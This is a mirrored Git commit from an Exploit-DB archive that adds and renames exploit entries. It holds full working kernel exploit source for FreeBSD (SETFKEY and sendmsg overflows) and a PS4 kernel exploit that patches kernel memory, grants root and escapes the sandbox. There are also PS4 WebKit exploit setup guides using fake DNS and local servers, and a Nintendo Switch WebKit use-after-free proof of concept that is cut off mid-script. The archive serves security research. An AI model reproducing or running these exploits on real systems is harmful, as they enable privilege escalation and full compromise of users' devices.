bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-03-01

Browse source 
26 changes to exploits/shellcodes

Sony Playstation 4 (PS4) 5.01 < 5.05 - WebKit Code Execution (PoC)
FreeBSD Kernel (FreeBSD 10.2 < 10.3 x64) - 'SETFKEY' (PoC)
FreeBSD Kernel (FreeBSD 10.2 x64) - 'sendmsg' Kernel Heap Overflow (PoC)
Apple iOS 11.2.5 / watchOS 4.2.2 / tvOS 11.2.5 - 'bluetoothd' Memory Corruption

Apple iOS - '.pdf' Jailbreak
Apple iOS - '.pdf' Local Privilege Escalation / Jailbreak

Foxit Reader 4.0 - '.pdf' Jailbreak
Foxit Reader 4.0 - '.pdf' Multiple Stack Based Buffer Overflow / Jailbreak

Sony Playstation 3 (PS3) 4.31 - Save Game Preview '.SFO' File Handling Local Command Execution
Sony Playstation 3 (PS3) 4.31 - Save Game Preview '.SFO' Handling Local Command Execution

Sony Playstation 4 4.05 FW - Local Kernel Loader
Sony Playstation 4 (PS4) 4.05 - Jailbreak (WebKit / 'namedobj ' Kernel Loader)

Sony Playstation 4 4.55 FW - Local Kernel
Sony Playstation 4 (PS4) 4.07 < 4.55 - 'bpf' Local Kernel Code Execution (PoC)
Sony Playstation 4 (PS4) 3.50 < 4.07 - WebKit Code Execution (PoC)
Sony Playstation 4 (PS4) 3.15 < 3.55 - WebKit Code Execution (PoC)
Sony Playstation 3 (PS3) < 2.50 - WebKit Code Execution (PoC)
WebKitGTK 2.1.2  (Ubuntu 14.04) - Heap based Buffer Overflow
Linux Kernel - 'BadIRET' Local Privilege Escalation
Sony Playstation 4 (PS4) 1.76 - 'dlclose' Linux Loader
Nintendo Switch - WebKit Code Execution (PoC)

Apple iTouch/iPhone 1.1.1 - '.tif' File Remote Jailbreak
Apple iTouch/iPhone 1.1.1 - '.tif' Remote Privilege Escalation / Jailbreak

Sony Playstation 4 (PS4) 4.55 - Jailbreak (WebKit 5.01 / 'bpf' Kernel Loader 4.55)

EPIC MyChart - SQL Injection
EPIC MyChart - X-Path Injection

Routers2 2.24 - Cross-Site Scripting
This commit is contained in:
Offensive Security 2018-03-01 05:01:48 +00:00
parent 5d48f0abd2
commit 6885f2dcc7
19 changed files with 1278 additions and 9 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

4
exploits/asp/webapps/44098.txt
View file

@ -1,4 +1,4 @@
# Exploit Title: Epic Systems Corporation MyChart SQL Injection
# Exploit Title: Epic Systems Corporation MyChart X-Path Injection
# Google Dork: MyChart® licensed from Epic Systems Corporation
# Date: 8/19/16
# Exploit Author: Shayan Sadigh (http://threat.tevora.com/author/shayan/)
@ -10,7 +10,7 @@
Epic Systems Corporation MyChart "is a web portal offered by most Epic healthcare organizations that gives you controlled access to the same Epic medical records your doctors use and provides convenient self-service functions that reduce costs and increase satisfaction."
The MyChart software uses Intersystems Caché for its DBMS and contains a pre-authenticated SQL injection due to the lack of sanatization for the GE parameter "topic".
The MyChart software contains an X-Path injection due to the lack of sanitization for the GE parameter "topic". A remote attacker can access contents of an XML document containing static display strings, such as field labels, via the topic parameter to help.asp.
EPIC was quick to respond to contact and patch the vulnerability in MyChart.

109
exploits/freebsd_x86-64/dos/44211.c Normal file
View file

@ -0,0 +1,109 @@
#include <stdio.h>
#include <stdlib.h>
#include <stddef.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/kbio.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <sys/param.h>
#include <sys/linker.h>
int (*kprintf)(const char *fmt, ...);
char *ostype;
uint64_t originalRip;
uint64_t originalRbp;
void *resolve(char *name) {
struct kld_sym_lookup ksym;
ksym.version = sizeof(ksym);
ksym.symname = name;
if(kldsym(0, KLDSYM_LOOKUP, &ksym) < 0) {
perror("kldsym");
exit(1);
}
printf(" [+] Resolved %s to %#lx\n", ksym.symname, ksym.symvalue);
return (void *)ksym.symvalue;
}
void payload(void) {
kprintf(" [+] Entered kernel payload\n");
strcpy(ostype, "CTurt ");
__asm__ volatile("swapgs; sysret");
}
// Copy the stack onto the heap
void heapOverflow(int index, size_t size) {
fkeyarg_t fkey;
fkey.keynum = index;
fkey.flen = size;
memset(&fkey.keydef, 0, 16);
ioctl(0, SETFKEY, &fkey);
}
// Copy the heap onto the stack
void stackOverflow(int index) {
fkeyarg_t fkey;
fkey.keynum = index;
fkey.flen = 16;
memset(&fkey.keydef, 0, 16);
ioctl(0, GETFKEY, &fkey);
}
int main(void) {
int result, i;
fkeyarg_t fkey;
uint32_t ripLower4 = 0x808312cd; // jmp rbp
uint64_t rbp = (uint64_t)payload;
kprintf = resolve("printf");
ostype = resolve("ostype");
printf(" [+] Set full length for key 10\n");
fkey.keynum = 10;
fkey.flen = 16;
ioctl(0, SETFKEY, &fkey);
printf(" [+] Set bad length and perform heap overflow\n");
heapOverflow(0, 128 - offsetof(fkeyarg_t, keydef) + 8 + 0x30 + sizeof(ripLower4));
printf(" [+] Prepare stack overflow memory\n");
fkey.keynum = 10;
fkey.flen = 16;
ioctl(0, GETFKEY, &fkey);
originalRbp = *(uint64_t *)((char *)&fkey.keydef + 4);
originalRip = 0xffffffff00000000 | *(uint32_t *)((char *)&fkey.keydef + 12);
printf(" [+] Original rip: %#lx\n", originalRip);
printf(" [+] Original rbp: %#lx\n", originalRbp);
*(uint64_t *)((char *)&fkey.keydef + 4) = rbp;
*(uint32_t *)((char *)&fkey.keydef + 12) = ripLower4;
ioctl(0, SETFKEY, &fkey);
printf(" [+] Trigger stack overflow\n");
fflush(stdout);
stackOverflow(0);
return 0;
}

159
exploits/freebsd_x86-64/dos/44212.c Normal file
View file

@ -0,0 +1,159 @@
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/param.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <sys/param.h>
#include <sys/linker.h>
void *(*ata_get_xport)(void);
int (*kprintf)(const char *fmt, ...);
char *ostype;
void *resolve(char *name) {
struct kld_sym_lookup ksym;
ksym.version = sizeof(ksym);
ksym.symname = name;
if(kldsym(0, KLDSYM_LOOKUP, &ksym) < 0) {
perror("kldsym");
exit(1);
}
printf(" [+] Resolved %s to %#lx\n", ksym.symname, ksym.symvalue);
return (void *)ksym.symvalue;
}
void dummy(void) {
}
void payload(void) {
kprintf(" [+] Entered kernel payload\n");
strcpy(ostype, "CTurt ");
}
#define INFO_SIZE 0
#define INFO_LIMIT 1
#define INFO_USED 2
#define INFO_FREE 3
#define INFO_REQ 4
#define INFO_FAIL 5
int getZoneInfo(char *zname, int i) {
#define BUF_SIZE 256
#define LINE_SIZE 56
unsigned int info[6] = { 0 };
FILE *fp = NULL;
char buf[BUF_SIZE];
char iname[LINE_SIZE];
fp = popen("/usr/bin/vmstat -z", "r");
if(fp == NULL) {
perror("popen");
exit(1);
}
memset(buf, 0, sizeof(buf));
memset(iname, 0, sizeof(iname));
while(fgets(buf, sizeof(buf) - 1, fp) != NULL) {
sscanf(buf, "%s %u, %u, %u, %u, %u, %u\n", iname, &info[INFO_SIZE], &info[INFO_LIMIT],
&info[INFO_USED], &info[INFO_FREE], &info[INFO_REQ], &info[INFO_FAIL]);
if(strncmp(iname, zname, strlen(zname)) == 0 && iname[strlen(zname)] == ':') {
break;
}
}
pclose(fp);
return info[i];
}
void craftCorruptedZone(void *zone) {
void **uz_slab = (void **)(zone + 200);
void **uz_dtor = (void **)(zone + 216);
void **uz_fini = (void **)(zone + 232);
void **uz_import = (void **)(zone + 240);
void **uz_release = (void **)(zone + 248);
*uz_slab = dummy;
*uz_fini = payload;
*uz_import = dummy;
*uz_release = dummy;
}
void craftZone(void *zone) {
void **uz_slab = (void **)(zone + 200);
void **uz_dtor = (void **)(zone + 216);
void **uz_fini = (void **)(zone + 232);
void **uz_import = (void **)(zone + 240);
void **uz_release = (void **)(zone + 248);
// put valid kernel address
*uz_slab = ata_get_xport;
*uz_fini = ata_get_xport;
*uz_import = ata_get_xport;
*uz_release = ata_get_xport;
}
int main(void) {
int sock;
struct msghdr msg;
ata_get_xport = resolve("ata_get_xport");
kprintf = resolve("printf");
ostype = resolve("ostype");
const int previousAllocations = getZoneInfo("mbuf", INFO_USED);
const size_t bufferSize = getZoneInfo("mbuf", INFO_SIZE);
const size_t overflowSize = previousAllocations * bufferSize + 0x4000;
char *mapping, *buffer, *overflow;
const size_t copySize = bufferSize + overflowSize;
const size_t mappingSize = (copySize + PAGE_SIZE - 1) & ~(PAGE_SIZE - 1);
mapping = mmap(NULL, mappingSize + PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
munmap(mapping + mappingSize, PAGE_SIZE);
buffer = mapping + mappingSize - copySize;
overflow = buffer + bufferSize;
memset(overflow, 0, overflowSize);
// sizeof(struct uma_zone) == 0x300, but since we can't be certain exactly where we overflow from, we will craft at 256 byte intervals
for(size_t i = previousAllocations * bufferSize + 0xe0; i < overflowSize - 256; i += 256) {
craftCorruptedZone(overflow + i);
}
sock = socket(AF_INET, SOCK_STREAM, 0);
memset(&msg, 0, sizeof(msg));
msg.msg_control = buffer;
msg.msg_controllen = -1;
printf(" [+] Performing overflow\n");
sendmsg(sock, &msg, 0);
printf(" [+] Triggering payload\n");
close(sock);
sock = socket(AF_INET, SOCK_STREAM, 0);
for(size_t i = previousAllocations * bufferSize + 0xe0; i < overflowSize - 256; i += 256) {
craftZone(overflow + i);
}
printf(" [+] Performing overflow\n");
sendmsg(sock, &msg, 0);
munmap(mapping, mappingSize);
return 0;
}

28
exploits/hardware/dos/44197.md Normal file
View file

@ -0,0 +1,28 @@
PS4 5.01 WebKit Exploit PoC
===========================
Based on:
- [CVE-2017-7005](https://bugs.chromium.org/p/project-zero/issues/detail?id=1208)
- [PegaSwitch](https://github.com/reswitched/pegaswitch) ([Copyright 2017 ReSwitched Team](https://github.com/reswitched/pegaswitch/blob/master/LICENSE.md))
- 4.0x exploit by [qwertyoruiopz](https://twitter.com/qwertyoruiopz)
> This exploit supports 5.01 (maybe others)!
Installation
============
1. Install the latest version of node from [nodejs.org](https://nodejs.org)
2. Clone this repository
3. Run `npm install`
Usage
=====
1. Run `npm start`
License
=======
MIT License. See attached `LICENSE.md` file.
Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44197.zip

0
exploits/bsd/local/43397.md → exploits/hardware/local/43397.md
View file

0
exploits/bsd/local/44177.c → exploits/hardware/local/44177.c
View file

29
exploits/hardware/local/44198.md Normal file
View file

@ -0,0 +1,29 @@
PS4 4.0x Code Execution
==============
This repo is my edit of the [4.0x webkit exploit](http://rce.party/ps4/) released by [qwertyoruiopz](https://twitter.com/qwertyoruiopz). The edit re-organizes, comments, and adds portability across 3.50 - 4.07 (3.50, 3.55, 3.70, 4.00, and of course 4.06/4.07). The commenting and reorganization was mostly for my own learning experience, however hopefully others can find these comments helpful and build on them or even fix them if I've made mistakes. The exploit is much more stable than FireKaku and sets up the foundation for running basic ROP chains and returns to normal execution. Credit for the exploit goes completely to qwertyoruiopz.
Organization
==============
Files in order by name alphabetically;
* expl.js - Contains the heart of the exploit and establishes a read/write primitive.
* gadgets.js - Contains gadget maps and function stub maps for a variety of firmwares. Which map is used is determined in the post-exploitation phase.
* index.html - The main page for the exploit. Launches the exploit and contains post-exploitation stuff, as well as output and code execution.
* rop.js - Contains the ROP framework modified from Qwerty's original exploit as well as the array in which module base addresses are held and gadget addresses are calculated.
* syscalls.js - Contains a system call map for a variety of firmwares as well as a 'name -> number' map for syscall ID's.
Usage
==============
Simply setup a web-server on localhost using xampp or any other program and setup these files in a directory. You can then go to your computer's local IPv4 address (found by running ipconfig in cmd.exe) and access the exploit.
Notes
==============
* The exploit is pretty stable but will still sometimes crash. If the browser freezes simply back out and retry, if a segmentation fault (identified by prompt "You do not have enough free system memory") occurs, refresh the page before trying again as it seems to lead to better results.
* This only allows code execution in ring3, to get ring0 execution a kernel exploit and KROP chain is needed.
* If I've made an error (particularily having to do with firmware compatibility and gadgets) feel free to open an issue on the repo.
* The exploit has been tested on 3.55 and 4.00, it is assumed to work on other firmwares listed but not guaranteed, again if you encounter a problem - open an issue on the repo.
Credits
==============
qwertyoruiopz - The original exploit, the likes of which can be found [here](http://rce.party/ps4/).
Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44198.zip

83
exploits/hardware/local/44199.md Normal file
View file

@ -0,0 +1,83 @@
PS4 3.55 Unsigned Code Execution
==============
This GitHub Repository contains all the necessary tools for getting PoC Unsigned Code Execution on a Sony PS4 System with firmwares 3.15, 3.50 and 3.55. <br />
This Exploit, is based-off [Henkaku's](https://henkaku.xyz/) WebKit Vulnerability for the Sony's PSVita. <br />
It includes basic ROP and is able to return to normal execution. <br />
Pre-Requisites:
==============
1. A PC
1. Running Windows, macOS or Linux
2. A already set up basic server where the PS4 User's Guide launcher will point for loading the payload
3. [Python](https://www.python.org/downloads/) 2.7.X
* Python 3.X gives problems, since they included major changes on the syntax and on the libraries in comparison with 2.7
2. A Sony PlayStation 4
1. Running the following firmwares:
* 3.15, 3.50 or 3.55
3. Internet Connection (PS4 and PC directly wired to the Router is the mostly preferred option)
Usage:
==============
There are two different methods to execute the Exploit, but first let's clarify how we will know which one to use. <br />
If your PlayStation 4 has got an already set-up PlayStation Network Account on it, you should use method 1. <br />
Else, if your PlayStation 4 -NEVER- had a PlayStation Network Account on it, you should use method 2. <br />
Probably you will ask why, it's pretty much easy to explain and understand: <br />
When you buy a PS4, comes unactivated, meaning that nobody has entered SEN Account on it. (Method 2) <br />
Once you use a SEN Account on it, the PS4 becomes an activated console. (Method 1) <br />
This doesn't affect the actual payload, but you should take in mind which method use. <br />
Method 1:
==============
Run this command on the folder you've downloaded this repo: <br />
`python server.py` <br />
All the debug options will be outputted during the Exploit process. <br />
Navigate to your PS4's Web Browser and simply type on the adress bar, your PC's IP Adress. <br />
Wait until the exploit finishes, once it does, PS4 will return to it's normal state. <br />
An example of what will look like found [HERE](https://gist.github.com/Fire30/2e0ea2d73d3a1f6f95d80aea77b75df8). <br />
Method 2:
==============
A dns.conf file which is present on the source, needs to be edited accordingly your local PC's IP Adress. <br />
PlayStation 4's DNS Settings must be changed in order to point the PC's IP Adress where the Exploit is located. <br />
Once you've edited the dns.conf file, simply run the next command on the folder where you downloaded this repo: <br />
`python fakedns.py -c dns.conf` <br />
And then: <br />
`python server.py` <br />
All the debug options will be outputted during the Exploit process. <br />
Once Python part is done, get into your PlayStation 4, navigate to the User's Guide page and wait until exploit finishes out. <br />
An example of what will look like found [HERE](https://gist.github.com/Fire30/2e0ea2d73d3a1f6f95d80aea77b75df8). <br />
Miscellaneous:
==============
If you want to try the socket test, change the IP Address located at the bottom of the ps4sploit.html file with your computer's one and run this command: <br />
`netcat -l 0.0.0.0 8989 -v` <br />
You should see something like: <br />
```
Listening on [0.0.0.0] (family 0, port 8989)
Connection from [192.168.1.72] port 8989 [tcp/sunwebadmins] accepted (family 2, sport 59389)
Hello From a PS4!
```
Notes about this exploit:
==============
* Currently, the exploit does not work 100%, but is around 80% which is fine for our purposes. <br />
* Although it is confirmed to work, sometimes will fail, just wait some seconds and re-run the payload. <br />
* Performing too much memory allocation after sort() is called, can potentially lead to more instability and it may crash more. <br />
* The process will crash after the ROP payload is done executing. <br />
* This is only useful for researchers. There are many many more steps needed before this becomes useful to normal users. <br />
Acknowledgements
================
xyz - Much of the code is based off of his code used for the Henkaku project
Anonymous contributor - WebKit Vulnerability PoC
CTurt - I basically copied his JuSt-ROP idea
xerpi - Used his idea for the socket code
rck\`d - Finding bugs such as not allocating any space for a stack on function calls
Maxton - 3.50 support and various cleanup
Thunder07 - 3.15 support
Contributing
================
The code currently is a bit of a mess, so if you have any improvements feel free to send a pull request or make an issue. Also I am perfectly fine if you want to fork and create your own project.
Download:

21
exploits/hardware/local/44200.md Normal file
View file

@ -0,0 +1,21 @@
CVE 2014-1303 Proof Of Concept for PS4
==============
This repository contains a poc for the CVE 2014-1303 originally disclosed by Liang Chen. It has been tested to work on system firmware 2.03, but should work for systems on a firmware < 2.50, the ROP test will however only work on 2.03.
Usage
==============
You need to edit the dns.conf to point to the ip address of your machine, and modify your consoles dns settings to point to it as well. Then run
`python fakedns.py -c dns.conf`
then
`python server.py`
Debug output will come from this process.
Navigate to the User's Guide page on the PS4 and various information should be printed to the console. The ROP test will print what is stored in the rsp register. Continuing execution after rsp is pivoted still needs to be done.
Acknowledgements
================
Liang Chen
thexyz
dreadlyei
Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44200.zip

274
exploits/hardware/local/44206.c Normal file
View file

@ -0,0 +1,274 @@
/*
Code written based on info available here http://cturt.github.io/dlclose-overflow.html
See attached LICENCE file
Thanks to CTurt and qwertyoruiop
- @kr105rlz
Download: //github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44206.zip
*/
#include "ps4.h"
#define DEBUG_SOCKET
#include "defines.h"
static int sock;
static void *dump;
void payload(struct knote *kn) {
struct thread *td;
struct ucred *cred;
// Get td pointer
asm volatile("mov %0, %%gs:0" : "=r"(td));
// Enable UART output
uint16_t *securityflags = (uint16_t*)0xFFFFFFFF833242F6;
*securityflags = *securityflags & ~(1 << 15); // bootparam_disable_console_output = 0
// Print test message to the UART line
printfkernel("\n\n\n\n\n\n\n\n\nHello from kernel :-)\n\n\n\n\n\n\n\n\n");
// Disable write protection
uint64_t cr0 = readCr0();
writeCr0(cr0 & ~X86_CR0_WP);
// sysctl_machdep_rcmgr_debug_menu and sysctl_machdep_rcmgr_store_moe
*(uint16_t *)0xFFFFFFFF82607C46 = 0x9090;
*(uint16_t *)0xFFFFFFFF82607826 = 0x9090;
*(char *)0xFFFFFFFF8332431A = 1;
*(char *)0xFFFFFFFF83324338 = 1;
// Restore write protection
writeCr0(cr0);
// Resolve creds
cred = td->td_proc->p_ucred;
// Escalate process to root
cred->cr_uid = 0;
cred->cr_ruid = 0;
cred->cr_rgid = 0;
cred->cr_groups[0] = 0;
void *td_ucred = *(void **)(((char *)td) + 304); // p_ucred == td_ucred
// sceSblACMgrIsSystemUcred
uint64_t *sonyCred = (uint64_t *)(((char *)td_ucred) + 96);
*sonyCred = 0xffffffffffffffff;
// sceSblACMgrGetDeviceAccessType
uint64_t *sceProcType = (uint64_t *)(((char *)td_ucred) + 88);
*sceProcType = 0x3801000000000013; // Max access
// sceSblACMgrHasSceProcessCapability
uint64_t *sceProcCap = (uint64_t *)(((char *)td_ucred) + 104);
*sceProcCap = 0xffffffffffffffff; // Sce Process
((uint64_t *)0xFFFFFFFF832CC2E8)[0] = 0x123456; //priv_check_cred bypass with suser_enabled=true
((uint64_t *)0xFFFFFFFF8323DA18)[0] = 0; // bypass priv_check
// Jailbreak ;)
cred->cr_prison = (void *)0xFFFFFFFF83237250; //&prison0
// Break out of the sandbox
void *td_fdp = *(void **)(((char *)td->td_proc) + 72);
uint64_t *td_fdp_fd_rdir = (uint64_t *)(((char *)td_fdp) + 24);
uint64_t *td_fdp_fd_jdir = (uint64_t *)(((char *)td_fdp) + 32);
uint64_t *rootvnode = (uint64_t *)0xFFFFFFFF832EF920;
*td_fdp_fd_rdir = *rootvnode;
*td_fdp_fd_jdir = *rootvnode;
}
// Perform kernel allocation aligned to 0x800 bytes
int kernelAllocation(size_t size, int fd) {
SceKernelEqueue queue = 0;
sceKernelCreateEqueue(&queue, "kexec");
sceKernelAddReadEvent(queue, fd, 0, NULL);
return queue;
}
void kernelFree(int allocation) {
close(allocation);
}
void *exploitThread(void *none) {
printfsocket("[+] Entered exploitThread\n");
uint64_t bufferSize = 0x8000;
uint64_t overflowSize = 0x8000;
uint64_t copySize = bufferSize + overflowSize;
// Round up to nearest multiple of PAGE_SIZE
uint64_t mappingSize = (copySize + PAGE_SIZE - 1) & ~(PAGE_SIZE - 1);
uint8_t *mapping = mmap(NULL, mappingSize + PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
munmap(mapping + mappingSize, PAGE_SIZE);
uint8_t *buffer = mapping + mappingSize - copySize;
int64_t count = (0x100000000 + bufferSize) / 4;
// Create structures
struct knote kn;
struct filterops fo;
struct knote **overflow = (struct knote **)(buffer + bufferSize);
overflow[2] = &kn;
kn.kn_fop = &fo;
// Setup trampoline to gracefully return to the calling thread
void *trampw = NULL;
void *trampe = NULL;
int executableHandle;
int writableHandle;
uint8_t trampolinecode[] = {
0x58, // pop rax
0x48, 0xB8, 0x19, 0x39, 0x40, 0x82, 0xFF, 0xFF, 0xFF, 0xFF, // movabs rax, 0xffffffff82403919
0x50, // push rax
0x48, 0xB8, 0xBE, 0xBA, 0xAD, 0xDE, 0xDE, 0xC0, 0xAD, 0xDE, // movabs rax, 0xdeadc0dedeadbabe
0xFF, 0xE0 // jmp rax
};
// Get Jit memory
sceKernelJitCreateSharedMemory(0, PAGE_SIZE, PROT_CPU_READ | PROT_CPU_WRITE | PROT_CPU_EXEC, &executableHandle);
sceKernelJitCreateAliasOfSharedMemory(executableHandle, PROT_CPU_READ | PROT_CPU_WRITE, &writableHandle);
// Map r+w & r+e
trampe = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_EXEC, MAP_SHARED, executableHandle, 0);
trampw = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_TYPE, writableHandle, 0);
// Copy trampoline to allocated address
memcpy(trampw, trampolinecode, sizeof(trampolinecode));
*(void **)(trampw + 14) = (void *)payload;
// Call trampoline when overflown
fo.f_detach = trampe;
// Start the exploit
int sockets[0x2000];
int allocation[50], m = 0, m2 = 0;
int fd = (bufferSize - 0x800) / 8;
printfsocket("[+] Creating %d sockets\n", fd);
// Create sockets
for(int i = 0; i < 0x2000; i++) {
sockets[i] = sceNetSocket("sss", AF_INET, SOCK_STREAM, 0);
if(sockets[i] >= fd) {
sockets[i + 1] = -1;
break;
}
}
// Spray the heap
for(int i = 0; i < 50; i++) {
allocation[i] = kernelAllocation(bufferSize, fd);
printfsocket("[+] allocation = %llp\n", allocation[i]);
}
// Create hole for the system call's allocation
m = kernelAllocation(bufferSize, fd);
m2 = kernelAllocation(bufferSize, fd);
kernelFree(m);
// Perform the overflow
int result = syscall(597, 1, mapping, &count);
printfsocket("[+] Result: %d\n", result);
// Execute the payload
printfsocket("[+] Freeing m2\n");
kernelFree(m2);
// Close sockets
for(int i = 0; i < 0x2000; i++) {
if(sockets[i] == -1)
break;
sceNetSocketClose(sockets[i]);
}
// Free allocations
for(int i = 0; i < 50; i++) {
kernelFree(allocation[i]);
}
// Free the mapping
munmap(mapping, mappingSize);
return NULL;
}
int _main(void) {
ScePthread thread;
initKernel();
initLibc();
initNetwork();
initJIT();
initPthread();
#ifdef DEBUG_SOCKET
struct sockaddr_in server;
server.sin_len = sizeof(server);
server.sin_family = AF_INET;
server.sin_addr.s_addr = IP(192, 168, 0, 4);
server.sin_port = sceNetHtons(9023);
memset(server.sin_zero, 0, sizeof(server.sin_zero));
sock = sceNetSocket("debug", AF_INET, SOCK_STREAM, 0);
sceNetConnect(sock, (struct sockaddr *)&server, sizeof(server));
int flag = 1;
sceNetSetsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (char *)&flag, sizeof(int));
dump = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
#endif
printfsocket("[+] Starting...\n");
printfsocket("[+] UID = %d\n", getuid());
printfsocket("[+] GID = %d\n", getgid());
// Create exploit thread
if(scePthreadCreate(&thread, NULL, exploitThread, NULL, "exploitThread") != 0) {
printfsocket("[-] pthread_create error\n");
return 0;
}
// Wait for thread to exit
scePthreadJoin(thread, NULL);
// At this point we should have root and jailbreak
if(getuid() != 0) {
printfsocket("[-] Kernel patch failed!\n");
sceNetSocketClose(sock);
return 1;
}
printfsocket("[+] Kernel patch success!\n");
// Enable debug menu
int (*sysctlbyname)(const char *name, void *oldp, size_t *oldlenp, const void *newp, size_t newlen) = NULL;
RESOLVE(libKernelHandle, sysctlbyname);
uint32_t enable;
size_t size;
enable = 1;
size = sizeof(enable);
sysctlbyname("machdep.rcmgr_utoken_store_mode", NULL, NULL, &enable, size);
sysctlbyname("machdep.rcmgr_debug_menu", NULL, NULL, &enable, size);
#ifdef DEBUG_SOCKET
munmap(dump, PAGE_SIZE);
#endif
printfsocket("[+] bye\n");
sceNetSocketClose(sock);
return 0;
}

218
exploits/hardware/local/44213.html Normal file
View file

@ -0,0 +1,218 @@
<!doctype html>
<html>
<head>
<title>CVE-2016-4657 Switch PoC</title>
<style>
body {font-size: 2em;}
a {text-decoration: none; color: #000;}
a:hover {color: #f00; font-weight: bold;}
</style>
</head>
<body>
<h1>CVE-2016-4657 Nintendo Switch PoC</h1>
<ul>
<li><a href=\'javascript:go();\'> go!</a></li>
<li><a href=\'javascript:document.location.reload();\'> reload</a></li>
</ul>
<div id=\'status\'> waiting... click go.</div>
<script>
// display JS errors as alerts. Helps debugging.
window.onerror = function(error, url, line) {
alert(error+\' URL:\'+url+\' L:\'+line);
};
</script>
<script>
// based on jbme.qwertyoruiop.com
// Thanks to:
// + qwertyoruiop
// + Retr0id
// + Ando
//
// saelo\'s phrack article is invaluable: http://www.phrack.org/papers/attacking_javascript_engines.html
// garbage collection stuff
var pressure = new Array(100);
// do garbage collect
dgc = function() {
for (var i = 0; i < pressure.length; i++) {
pressure[i] = new Uint32Array(0x10000);
}
for (var i = 0; i < pressure.length; i++) {
pressure[i] = 0;
}
}
// access to the overlapping Uint32Array
var bufs = new Array(0x1000);
// we will modify the vector of this
var smash = new Uint32Array(0x10);
// the array with the stale pointer
var stale = 0;
var _dview = null;
// write 2x 32bit in a DataView and get the Float representation of it
function u2d(low, hi) {
if (!_dview) _dview = new DataView(new ArrayBuffer(16));
_dview.setUint32(0, hi);
_dview.setUint32(4, low);
return _dview.getFloat64(0);
}
function go_() {
// check if the length of the array smash changed already. if yes, bail out.
if (smash.length != 0x10) return;
// garbage collect
dgc();
// new array with 0x100 elements
var arr = new Array(0x100);
// new array buffer of length 0x1000
var yolo = new ArrayBuffer(0x1000);
// populate the arr with pointer to yolo and a number. not quite sure why.
arr[0] = yolo;
arr[1] = 0x13371337;
// create an object whos toString function returns number 10 and messes with arr.
var not_number = {};
not_number.toString = function() {
arr = null;
props[\"stale\"][\"value\"] = null;
// if bufs is already overlapping memory, bail out.
if (bufs[0]) return 10;
// really make sure garbage is collected
// the array pointed at by arr should be gone now.
for (var i = 0; i < 20; i++) {
dgc();
}
// for the whole buf Array
for (i = 0; i < bufs.length; i++) {
// fill it with a lot of Uint32Arrays, hopefully allocated where arr was earlier
bufs[i] = new Uint32Array(0x100 * 2)
// for each element of that array
for (k = 0; k < bufs[i].length;) {
// set memory to 0x41414141 0xffff0000
// basically spraying the JSValue 0xffff000041414141
// which is the Integer 0x41414141
// phrack: Integer FFFF:0000:IIII:IIII
bufs[i][k++] = 0x41414141;
bufs[i][k++] = 0xffff0000;
}
}
return 10;
};
// define a new object with some properties
var props = {
p0: { value: 0 },
p1: { value: 1 },
p2: { value: 2 },
p3: { value: 3 },
p4: { value: 4 },
p5: { value: 5 },
p6: { value: 6 },
p7: { value: 7 },
p8: { value: 8 },
// the length of this object is set to this object that does evil stuff with toString()
length: { value: not_number },
// the reference to the arr array. Which will later be freed.
stale: { value: arr },
after: { value: 666 }
};
// define a new target array
var target = [];
// TRIGGER BUG!
// set the properties of the target based on the previously defined ones
Object.defineProperties(target, props);
// get a reference to the target stale property, which points to arr
stale = target.stale;
// make sure that the stale[0] points actually to the 0x41414141 data if not, we don\'t wanna mess with it and try again
if(stale[0]==0x41414141) {
// stale[0] is now pointing at a fake Integer 0x41414141. Now make it 0x41414242
stale[0] += 0x101;
//stale[0] = 0x41414242;
//document.getElementById(\'status\').innerText = \'bug done.\';
// searching the whole memory that is overlaying the old arr. Looking for 0x41414242
for (i = 0; i < bufs.length; i++) {
for (k = 0; k < bufs[0].length; k++) {
// Found the value! bufs[i][k] point now at the same memory as stale[0]
if (bufs[i][k] == 0x41414242) {
alert(\'Overlapping Arrays found at bufs[\'+i+\'][\'+k+\']\\nsmash.length is still: 0x\'+smash.length.toString(16));
// create a new object. Will look kinda like this:
// 0x0100150000000136 0x0000000000000000 <- fictional value
// 0x0000000000000064 0x0000000000000000 <- [\'a\'],[\'b\']
// 0x???????????????? 0x0000000000000100 <- [\'c\'],[\'d\']
stale[0] = {
\'a\': u2d(105, 0), // the JSObject properties ; 105 is the Structure ID of Uint32Array
\'b\': u2d(0, 0),
\'c\': smash, // var pointing at the struct of a Uint32Array(0x10)
\'d\': u2d(0x100, 0)
}
alert(\'created the JSObject.\\nstale[0] = \'+stale[0]);
// remember the original stale pointer, pointing at the object with the a,b,c,d properties
stale[1] = stale[0];
// now add 0x10 to the pointer of stale[0], which points now in the middle of the object.
bufs[i][k] += 0x10;
// check the type of stale[0].
// removed the loop because it makes the exploit sooooooo unreliable
// based on phrack paper - Predicting structure IDs (http://www.phrack.org/papers/attacking_javascript_engines.html)
/*while(!(stale[0] instanceof Uint32Array)) {
// if stale[0] is not a Uint32Array yet, increment the structureID guess
structureID++;
// assign the next structureID to the original object still referenced by stale[1]
stale[1][\'a\'] = u2d(structureID, 0);
}*/
// Give some information. stale[0] should now be a Uint32Array
alert(\'misaligned the pointer to the JSObject.\\nstale[0] = \'+stale[0]+\'\');
// write to the 6th 32bit value of the memory pointed to by the crafted Uint32Array
// which should point to the struct of smash, allowing us to overwrite the length of smash
stale[0][6] = 0x1337;
// check the length of smash is now.
